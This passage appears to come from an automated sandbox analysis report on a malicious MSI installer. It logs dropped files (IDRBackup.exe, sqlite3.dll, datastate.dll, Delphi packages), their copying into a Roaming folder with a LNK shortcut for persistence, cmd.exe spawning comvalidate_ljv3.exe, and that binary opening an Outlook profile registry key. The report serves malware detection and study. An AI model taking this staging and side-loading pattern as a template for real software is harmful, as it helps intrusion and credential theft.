                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: sqlite3.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: datastate.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: oledlg.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msftedit.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: comsvcs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmlua.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: sqlite3.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: datastate.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: oledlg.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeSection loaded: cryptsp.dllJump to behavior
                      Source: wpfwiocg.7.drLNK file: ..\..\Roaming\toolsync_RO\IDRBackup.exe
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: ONHQNHFT.msiStatic file information: File size 6766592 > 1048576
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: comvalidate_ljv3.exe, 0000000A.00000002.2626853717.0000000005EE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623026868.00000000046EC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619374589.0000000002247000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2620951892.00000000038EF000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623225384.00000000048EA000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627947736.00000000064E4000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624804585.00000000054E8000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625300659.00000000058E0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2628626053.00000000068E3000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622021579.0000000003EEA000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622324566.00000000040E6000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629272088.0000000006EE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2628288211.00000000066E9000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627346574.00000000060EE000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625763769.0000000005CE4000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627613921.00000000062EB000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619991130.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624105181.0000000004EE6000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625084870.00000000056E5000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623508984.0000000004AEC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623879071.0000000004CE7000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624550732.00000000052E5000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622622578.00000000042EE000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629082480.0000000006CEF000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625484846.0000000005AE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2621662169.0000000003CEC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2621456099.0000000003AEC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_
                      Source: Binary string: wntdll.pdbUGP source: IDRBackup.exe, 00000002.00000002.1806069392.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1804905047.0000000003B12000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2286422984.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285768066.000000000460E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2542312095.0000000005580000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541724901.0000000004CB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897539758.0000000005120000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897095781.000000000485A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: comvalidate_ljv3.exe, 0000000A.00000002.2626853717.0000000005EE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623026868.00000000046EC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619374589.0000000002247000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2620951892.00000000038EF000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623225384.00000000048EA000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627947736.00000000064E4000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624804585.00000000054E8000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625300659.00000000058E0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2628626053.00000000068E3000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622021579.0000000003EEA000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622324566.00000000040E6000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629272088.0000000006EE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2628288211.00000000066E9000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627346574.00000000060EE000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625763769.0000000005CE4000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2627613921.00000000062EB000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619991130.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624105181.0000000004EE6000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625084870.00000000056E5000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623508984.0000000004AEC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2623879071.0000000004CE7000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2624550732.00000000052E5000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2622622578.00000000042EE000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629082480.0000000006CEF000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2625484846.0000000005AE0000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2621662169.0000000003CEC000.00000004.00000001.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2621456099.0000000003AEC000.00000004.00000001.00020000.00000000.sdmp, comvalida
                      Source: Binary string: wntdll.pdb source: IDRBackup.exe, 00000002.00000002.1806069392.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1804905047.0000000003B12000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2286422984.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285768066.000000000460E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2542312095.0000000005580000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541724901.0000000004CB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897539758.0000000005120000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897095781.000000000485A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatiner source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C488B27 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,3_2_6C488B27
                      Source: wqosufsc.7.drStatic PE information: real checksum: 0x280dfb should be: 0x278f67
                      Source: ikltbdky.19.drStatic PE information: real checksum: 0x280dfb should be: 0x278f67
                      Source: datastate.dll.1.drStatic PE information: real checksum: 0x1ac96 should be: 0x1d6c3
                      Source: datastate.dll.2.drStatic PE information: real checksum: 0x1ac96 should be: 0x1d6c3
                      Source: sqlite3.dll.1.drStatic PE information: section name: /4
                      Source: sqlite3.dll.1.drStatic PE information: section name: /19
                      Source: sqlite3.dll.1.drStatic PE information: section name: /31
                      Source: sqlite3.dll.1.drStatic PE information: section name: /45
                      Source: sqlite3.dll.1.drStatic PE information: section name: /57
                      Source: sqlite3.dll.1.drStatic PE information: section name: /70
                      Source: sqlite3.dll.1.drStatic PE information: section name: /81
                      Source: sqlite3.dll.1.drStatic PE information: section name: /92
                      Source: sqlite3.dll.2.drStatic PE information: section name: /4
                      Source: sqlite3.dll.2.drStatic PE information: section name: /19
                      Source: sqlite3.dll.2.drStatic PE information: section name: /31
                      Source: sqlite3.dll.2.drStatic PE information: section name: /45
                      Source: sqlite3.dll.2.drStatic PE information: section name: /57
                      Source: sqlite3.dll.2.drStatic PE information: section name: /70
                      Source: sqlite3.dll.2.drStatic PE information: section name: /81
                      Source: sqlite3.dll.2.drStatic PE information: section name: /92
                      Source: comvalidate_ljv3.exe.7.drStatic PE information: section name: Shared
                      Source: wqosufsc.7.drStatic PE information: section name: .xdata
                      Source: wqosufsc.7.drStatic PE information: section name: cvgr
                      Source: ikltbdky.19.drStatic PE information: section name: .xdata
                      Source: ikltbdky.19.drStatic PE information: section name: cvgr
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_50012004 push 50012030h; ret 2_2_50012028
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F22C push eax; retn 00FEh2_2_5000F230
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F234 push eax; ret 2_2_5000F238
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F26C push eax; retf 00FEh2_2_5000F270
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F274 push eax; retf 2_2_5000F278
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F294 push eax; iretd 2_2_5000F298
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_500153A4 push 500153D0h; ret 2_2_500153C8
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F49C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4A4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4AC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4B4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4BC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4C4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4CC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4D4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4DC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4E4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4EC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4F4 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F4FC push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F504 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F50C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F514 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F51C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F524 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F52C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F534 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F53C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F544 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F54C push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F554 push 5000F5F8h; ret 2_2_5000F5F0
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\datastate.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\vclx120.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\madbasic_.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\madexcept_.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\vclx120.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\vcl120.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\datastate.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\madexcept_.bplJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ikltbdkyJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\madbasic_.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\maddisAsm_.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\maddisAsm_.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\vcl120.bplJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\wqosufscJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\sqlite3.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\madexcept_.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\vcl120.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\vclx120.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\madbasic_.bplJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\Aplanogamete\maddisAsm_.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\madbasic_.bplJump to dropped file
